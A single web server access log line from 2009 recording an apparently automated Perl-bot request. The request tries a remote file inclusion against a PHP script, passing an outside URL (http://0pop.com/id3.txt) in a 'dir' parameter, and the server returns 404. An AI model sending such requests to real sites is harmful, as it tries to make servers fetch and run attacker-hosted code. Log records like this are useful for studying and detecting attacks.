85.25.94.14 - - [08/Nov/2009:22:07:18 -0800] "GET /logs/access_090504.log//skin/zero_vote/ask_password.php?dir=http://0pop.com/id3.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
